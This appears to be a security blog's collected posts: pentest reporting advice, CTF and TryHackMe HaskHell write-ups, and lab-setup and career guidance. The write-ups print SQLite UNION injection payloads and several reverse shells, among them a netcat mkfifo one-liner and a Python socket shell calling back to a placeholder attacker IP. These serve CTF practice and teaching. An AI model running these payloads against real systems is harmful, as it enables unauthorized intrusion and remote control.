A few months ago I passed the eWPT exam. That is when I realized that writing a pentest report can be hard for people who have just broken into the industry.
This article will give some simple steps on how to write a pentest report and the important elements that should be in it. It aims to give professionals new to the field some advice on how to write a report for exams or for customers. It can also be used by bug hunters (the vulnerability report part).
This article is short on purpose: I want it to be clear and not tedious to read, as the process of writing a report can seem daunting to newcomers.
Why do we need a report?
A report is the document that presents all your findings to every role in the company that hired you for the engagement. It contains the scope previously agreed with your customer, high-level explanations of the findings and their impact, and precise technical descriptions of every finding. A report has several parts.
The Executive Summary
This is the part written for the executives of the company who will read the report. It needs to be high-level explanations with no technical details.
It is relevant to add graphs of the findings such as: vulnerabilities by impact, attacks by type and vulnerabilities by cause.
The definitions in MITRE CWE can help you define the categories used in those graphs.
It can include an overall assessment of how the findings, and combinations of them, could impact your customer’s business.
It can also be useful to include a remediation priority based on your expertise and the prior discussions you had with your customer.
The Vulnerability Report
This is the part where you present each vulnerability you found. I recommend that you order them by severity.
Each vulnerability should have a score that you can calculate using CVSS. Here is a calculator. This score takes into account precise metrics to produce a score as close as possible to the impact the vulnerability could have. However, depending on your customer’s context the impact might differ; your expertise and the prior conversation you had with your customer about their business will help you define the impact for them. You don’t need to tamper with the CVSS metrics: that is the goal of the remediation priority I mentioned in the previous part.
Here is a way to present it:
- CVSS score
- Affected item
- Description: you have to explain the vulnerability, and explain it in the context of your target. For example: « In the context of the support page, some checks were made on the client side, but those checks could be bypassed. » Feel free to add resources about the vulnerability.
- Remediation: here you have to explain how to mitigate the vulnerability. It is always good to add resources from recognized industry standards like OWASP for web pentesting reports.
- Evidence: here you need to add proof of the vulnerability. The goal is that the team that will implement the mitigation is able to reproduce the attack. That is why it is important that during the attacking phase you write plenty of notes and take plenty of screenshots and proofs.
Note: I personally prefer each vulnerability to be presented with its remediation, but you can also write a remediation report part right after this.
Here is a great template done by Andrew Morrison (docx and odt):
- Pentext is a collection of XML templates, XML schemas and XSLT code, which combined provide an easy way to generate IT security documents including test reports
- Pentest standards about reporting
- Radically Open Security provides in their portfolio some reports of projects they did. Those are good examples.
- MITRE ATT&CK is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations.
- CWE is a community-developed list of software and hardware weakness types. It serves as a common language, a measuring stick for security tools, and as a baseline for weakness identification, mitigation, and prevention efforts.
- OWASP list of vulnerabilities (for web pentesting)
- Exploit db is a great resource for exploitation
- National Vulnerability Database by the US CERT
Setting up the attacking machine
Access a browser and use Burp or a proxy
I wanted to explain the setup details because I really think it is useful for anyone who would like to play CTFs and needs a browser when the connection to the attacking machine is made through SSH.
So this introduction aims to be useful for any CTF, or even daily practice at your job.
You will have to use -D and -C when launching the command:
sudo ssh -C -i metasploit_ctf_kali_ssh_key.pem kali@<REMOTE-IP> -D 4444
-D specifies the local port you wish to use for forwarding (SSH opens a SOCKS proxy on it)
-C enables compression
-i specifies the location of the key file
Then we need to configure the SOCKS proxy in Burp under the User options tab (it can also be done under Project options, depending on whether you wish to keep it permanently or just for a specific project).
Then you can configure your browser proxy as you usually do with Burp Suite (note: this picture is of FoxyProxy, a Firefox add-on that I would recommend to anyone who often works on web pentests):
For this CTF my teammate CptButtStuff was using proxychains, which is an amazing tool to launch a local program through the proxy.
Here is how to set it up:
Open a new tab and run ssh again as follows, using a different port than the one you used for Burp:
sudo ssh -i metasploit_ctf_kali_ssh_key.pem kali@<REMOTE-IP> -D 5555
Edit the proxychains conf file /etc/proxychains.conf:
socks5 127.0.0.1 5555
And then you can launch whichever program you wish using proxychains (here I am using nmap):
proxychains nmap <IP-ADDRESS>
Cool! But how can I get a file from the remote host to my local machine?
You can use scp as follows:
scp -i private_key.pem username@remote:/path/to/file /local/dir
Now that we have a setup ready (and not only for this challenge 😀) we can work on 2 of spades.
On port 9001 the service was HTTP (see below the extract of my nmap scan):
9001/tcp open http Thin httpd
When we browse to this page we get a form:
One of the first things that comes to mind with a form is SQL injection, so I tried this and got a nice error disclosing plenty of info:
' Union select 1, 2 --
This basically means that we need to try adding another column.
And there we go:
Now that we know that the backend DB is SQLite, let’s find payloads to dump the database:
| Purpose | Query |
|---|---|
| Table name enumeration | SELECT name FROM sqlite_master WHERE type='table' |
| Table schema enumeration | SELECT sql FROM sqlite_master WHERE type='table' |
I used this one and got the schema of the tables:
' Union SELECT null, null, sql FROM sqlite_master WHERE type='table' --
The first line is exactly the one we need, so now we can query the information needed to get the flag:
' Union SELECT 1, flag, link from hidden --
And there we have our flag; we just need to wget the PNG file and md5sum it to get the flag:
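To show what the remediation section of the report would point at, here is an added example (my own code, not the challenge’s backend and not part of the original write-up) that puts a string-concatenated SQLite lookup next to its parameterized form and runs the three payloads from the write-up against both. The in-memory database, its tables (cards, hidden) and the flag value are constructed samples.

```python
"""Vulnerable vs. parameterized SQLite lookup, exercised with the UNION payloads above."""
import sqlite3


def build_db():
    """Constructed in-memory database standing in for the challenge backend (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE cards (id INTEGER, name TEXT, suit TEXT);
        INSERT INTO cards VALUES (1, 'two', 'spades');
        CREATE TABLE hidden (id INTEGER, flag TEXT, link TEXT);
        INSERT INTO hidden VALUES (1, 'FLAG{constructed-sample}', '/files/card.png');
    """)
    return conn


def lookup_vulnerable(conn, user_input):
    """String concatenation: the user's text becomes part of the SQL statement."""
    query = f"SELECT id, name, suit FROM cards WHERE name = '{user_input}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn, user_input):
    """Parameterized query: the driver binds the value, which is never parsed as SQL."""
    query = "SELECT id, name, suit FROM cards WHERE name = ?"
    return conn.execute(query, (user_input,)).fetchall()


def probe(conn, payload):
    """Run a payload through the vulnerable lookup; return (rows, error_text).

    The error text is what an application that echoes database errors would leak,
    which is how the column count was discovered in the write-up.
    """
    try:
        return lookup_vulnerable(conn, payload), None
    except sqlite3.OperationalError as exc:
        return [], str(exc)


if __name__ == "__main__":
    db = build_db()
    for payload in (
        "' Union select 1, 2 --",
        "' Union SELECT null, null, sql FROM sqlite_master WHERE type='table' --",
        "' Union SELECT 1, flag, link from hidden --",
    ):
        rows, err = probe(db, payload)
        print("vulnerable:", payload, "->", err or rows)
        print("safe:      ", payload, "->", lookup_safe(db, payload))
```

With the parameterized version every payload is compared literally against the name column and returns nothing, which is the fix the remediation entry should describe; the vulnerable version reproduces the column-count error, the schema dump and the flag row in turn.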
It has always been difficult for me to get a concrete idea of a job, especially in the changing world in which we live.
In the 21st century, the importance of transversal skills as meta-skills is becoming apparent. In other words, in the world of cybersecurity, a job may contain different skills needed to be effective in its practice. In cyber professions, whether technical or non-technical, learning how to learn becomes essential to adapt to a rapidly changing environment.
This demand for flexibility encourages observation, evaluation and analysis, while sharing with your peers resources, expertise and vision for protecting citizens’ data and their way of life.
Living in the 21st century disrupts traditional learning in favour of continuous learning, but how do we transform information into knowledge?
In this article I will try to answer the questions: What are the different areas of cybersecurity? What skills are needed to work in cybersecurity? What careers are there?
The different areas in Cybersecurity
The careers in Cybersecurity
- Cyber career pathway tool by US National Initiative for Cybersecurity Careers and Studies
- CyberSeek’s career pathway
Which skill for which career?
About degrees and salaries
- Cybersecurity Jobs: Overview by Cyber Degrees
- No Career Ladders For Cybersecurity Professionals? by Cybersecurity Ventures
Cybersecurity being a young field, degrees are not the only way to get a job; the experience and motivation of the candidate remain what make the difference for an employer. You can train yourself, pass certifications and engage with cybersecurity organizations to demonstrate this motivation.
When people ask me how to get into pentesting, the first thing I say is that practice is essential. But how do you practice pentesting on your own? How do you get started with virtual machines?
In this article I am going to explain how to create a virtual attacking machine. With this machine you will be able to practice on platforms that have « boxes ». Boxes are vulnerable machines that can be hacked. I will then present some of the websites you can use for practice.
Practicing this way is very helpful because it is the closest way to understand pentesting (it is not realistic, but you will learn the core techniques used in pentests).
How to get started ?
Create your virtual attacking machine with Kali Linux
- Download Virtualbox and install it: https://www.virtualbox.org/
- Download the latest Kali Linux VirtualBox image (it is going to be our attacker machine). Make sure to take the VirtualBox image and not the VMware one:
- Install Kali:
- Go to VirtualBox and click on « File » > « Import Appliance… »
- Click on the yellow folder, navigate to the Kali image you downloaded, select it and click on Open
- Click on Next and then on Import. It will take a little while… Then launch it for the first time. The username should be kali and the password kali, but you can find this info on their website or in the description of your machine in VirtualBox
What website can you use?
Some great starters
First I would recommend creating an account on TryHackMe here; it’s free! Then you will have to download your configuration file and connect to the VPN so you can start hacking away on their machines.
What is awesome about TryHackMe is that you even have a box to learn how to get started on their platform here. This other box will tell you everything about OpenVPN and how to access the boxes. So it will be useful not only on TryHackMe but also on other platforms and in your daily practice as a pentester (we sometimes need a VPN to access the customer’s systems we test).
If you are not familiar with VPNs, here is a Wikipedia article explaining what they are. Simply put, you can see a VPN as a tool that gives you remote access to another computer or environment. TryHackMe and other websites for pentesting practice require a VPN so that you can access your practice environment, usually a vulnerable machine to hack.
If you are not familiar with Linux, TryHackMe has a box that explains it very well; you even get a cool badge for completing it! You can also practice on overthewire.org: this website is a wargame where you will learn about Linux and security concepts. If you want more explanation of the concepts you should definitely go to Linux Journey.
After this you can have a look at the box on TryHackMe that introduces you to pentesting: basic pentesting.
Here is a list of great boxes (all free) on TryHackMe for beginners:
- Learn Nmap
- Learn the web fundamentals
- Learn about active recon, web app attacks and privilege escalation on Vulniversity
- Learn how to research efficiently on search engines
- Get familiar with Metasploit
- Learn about Google Dorking
- A fun way to learn the basics of pentesting with a Christmas theme
- Walkthrough on exploiting a Linux machine with Kenobi
- A crash course on various topics in penetration testing
There are plenty more; I really recommend you have a look around.
Push your skills further with other platforms
Have you covered the beginner skills? Do you want to go further? Here are some useful resources for this.
- Get your OSCP certification with Rana Khalil’s gitbook and Hackthebox
- Join CTF platforms: root-me, ringzer0; find lots of other CTF platforms in my resources article here, in the section learning by doing.
- Hack lots of boxes that you deploy on VirtualBox with VulnHub.
- Get into bug bounty with HackerOne, Bugcrowd (find other bug bounty platforms in my resources).
- Do not stay alone in your practice: join groups like Hackthebox Ottawa, OWASP chapters, the (ISC)2 Toronto chapter, CSNP and so many others; you can find ones near you on meetup.com.
Today I am going to present the write-up for HaskHell on TryHackMe.
First of all, after having deployed the machine, we can run nmap on the target IP:
nmap -p- -sV 10.10.54.105
Result of nmap:
kali@kali:~$ nmap -p- -sV 10.10.54.105 -T4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-11 11:40 EDT
Nmap scan report for 10.10.54.105
Host is up (0.23s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
5001/tcp open  http    Gunicorn 19.7.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1183.25 seconds
We can see that port 5001 is HTTP and open.
Let’s have a look at port 5001.
Go to http://<target-ip>:5001
If you click on « homework here » you will find a page with an exercise.
The link to submit the exercise responds with a 404.
Also, the following screen shows us that this teacher has already had hacker students:
This also gives us a huge hint: we can submit a Haskell script and it will be interpreted. So let’s try to make a reverse shell.
But first let’s try to execute a command. Here is the documentation for executing a command with Haskell: System.Process on Hackage
Also we need to find where to upload our script; let’s run dirb:
Okay, now that we know where to put our script, let’s write it!
Reverse shell with Haskell
I did not know anything about Haskell, so after some digging I found out that I had to save my script with a .hs extension for it to be recognized and executed by our target.
Also the text in homework1 specifies: « Your file will be compiled and ran and all output will be piped to a file under the uploads directory. »
This means that we will be able to see our output and errors in order to debug our script if needed (which was really helpful for me).
First I tried a simple ls:
#!/bin/env runhaskell
import System.Process

main :: IO ()
main = do
  let stdin' = ""
  -- run "ls -lar" and capture exit code, stdout and stderr
  (errCode, stdout', stderr') <- readProcessWithExitCode "ls" ["-lar"] stdin'
  putStrLn $ "stdout: " ++ stdout'
  putStrLn $ "stderr: " ++ stderr'
  putStrLn $ "errCode: " ++ show errCode
And I got this:
On pentestmonkey.net we find the following command:
nc -e /bin/sh 10.0.0.1 1234
So I tried netcat with the -e option to specify what to run after connecting.
However, there were two errors in my case: my port 1234 was busy and the netcat binary on the target did not support the -e option. Resolving the first error is easy (I changed my port to 8888) but not the second one 🙂
So the script that worked for me was the following:
module Main where
import System.Process

main = system "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your-ip> 8888>/tmp/f"
Indeed, according to this website, the following command works with the other netcat versions:
#other version of netcat
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 8888 >/tmp/f
Do not forget, before uploading the script, to launch your listener on your attacking machine:
nc -lvp 8888
And then we get a shell:
And we can get the user flag:
$ ls
__pycache__ user.txt
$ cat user.txt
Now that we have user we need to get root. But first let’s find a way to avoid having to connect through our web shell. Let’s try to use SSH. If we navigate to the user’s .ssh folder we find a key pair.
Let’s get those onto our attacker machine by running Python’s simple HTTP server.
Then from the attacking machine we can connect through SSH after having set the proper permissions on our private key (700).
To have an interactive shell we can run this:
python -c 'import pty; pty.spawn("/bin/bash")'
And there we go:
Linux enumeration with linPEAS:
Let’s upload linPEAS to our target machine.
On our Kali we run:
And then we launch Python’s simple server to serve it to the target:
And from our target we get it with:
$ wget http://10.2.28.215:8000/linpeas.sh
$ chmod 755 linpeas.sh
$ ./linpeas.sh
linPEAS is very good, but in this context we could have done a sudo -l first and that would have been enough. It is a good habit to try this before doing anything else.
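Since sudo -l is the check that would have revealed the escalation path here, the following added example (my own code, not part of the original write-up or of linPEAS) parses the rules section of sudo -l output and flags entries that let a user run an interpreter or script runner as another account, which is the kind of rule an administrator should review when hardening a host. The sudo -l text is a constructed sample; the user, host and command paths in it are placeholders.

```python
"""Audit `sudo -l` output for rules that hand an interpreter or script runner to another user."""
import re

# Binaries that execute whatever code they are pointed at. A sudo rule that runs one of
# them as root is effectively a grant of root (illustrative list, not exhaustive).
CODE_RUNNERS = {"python", "python2", "python3", "perl", "ruby", "runhaskell", "ghc",
                "flask", "node", "bash", "sh", "env", "vim", "vi", "less", "more"}

# Matches lines such as "    (root) NOPASSWD: /usr/bin/flask run" or "    (root) /usr/bin/apt-get update".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")

# Constructed sample of `sudo -l` output (placeholder user/host, not from the page's target).
SAMPLE_SUDO_L = """\
Matching Defaults entries for user1 on target:
    env_reset, mail_badpass

User user1 may run the following commands on target:
    (root) NOPASSWD: /usr/bin/flask run
    (root) /usr/bin/apt-get update
    (www-data) NOPASSWD: /usr/bin/python3 /opt/app/report.py
"""


def parse_sudo_l(text):
    """Return one dict per command rule found after the 'may run the following commands' line."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip(":") for t in m.group("tags").split()}
        rules.append({
            "runas": m.group("runas").strip(),
            "nopasswd": "NOPASSWD" in tags,
            "command": m.group("cmd").strip(),
        })
    return rules


def risky_rules(rules):
    """Flag rules whose command is ALL or whose binary is a known code runner."""
    flagged = []
    for rule in rules:
        binary = rule["command"].split()[0].rsplit("/", 1)[-1]
        if rule["command"] == "ALL" or binary in CODE_RUNNERS:
            flagged.append({**rule, "reason": f"runs arbitrary code as {rule['runas']}"})
    return flagged


if __name__ == "__main__":
    for rule in risky_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        pw = "NOPASSWD" if rule["nopasswd"] else "password required"
        print(f"[REVIEW] ({rule['runas']}) {rule['command']} [{pw}] - {rule['reason']}")
```

A rule that launches an interpreter as root is flagged whether or not a password is required, because the password only authenticates the user; it does not constrain what the interpreter then executes.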
Here is what we get if we run flask:
Well, it is something very useful. We know that we need to write a script and launch it as root. In my case I did a reverse shell, but it can be even easier to just launch a shell with a Python command.
Here is the reverse shell I did with a script:
#!/usr/bin/env python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("your-ip",8888))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
We then just have to set up a new listener on our attacker machine:
nc -lvp 8888
We export our script into the environment on the target machine:
And we run our script as root from the target machine:
We get a shell on our attacking machine. So let’s run our command to get an interactive shell:
python -c 'import pty; pty.spawn("/bin/bash")'
We now have the root flag:
CyberSecurity NonProfit (CSNP) is a 501(c)(3) nonprofit organization that provides free security education and resources to make cybersecurity more accessible, inclusive, and diverse.
I was invited to talk and I discussed what pentesters do, what skills are needed, and how to start a career in pentesting. I also demonstrated web application exploits such as SQL injection and cross-site scripting (XSS).
Masarah Paquet-Clouston is a security researcher at GoSecure, a PhD candidate in criminology at Simon Fraser University and a collaborator on the Stratosphere IPS project in Prague. She conducts research in the field of cybercrime. In recent years her research has focused on botnets, bitcoin tracing, online drug trafficking and organized crime. In 2016, Masarah won the Mitacs award for her research on « fake likes ».
Today she tells us about her career path, her research and her involvement in increasing the visibility of women in the field of cybersecurity.
Lisandre Cadotte is a pentester at Vidéotron, a Quebec telecommunications company. She has more than six years of experience in the field of cybersecurity.
She often takes part in CTFs and publishes write-ups on her website, as well as a large collection of resources useful to pentesters. She is also passionate about music.
In this episode, Lisandre tells us about her career path, her job and her vision of cybersecurity.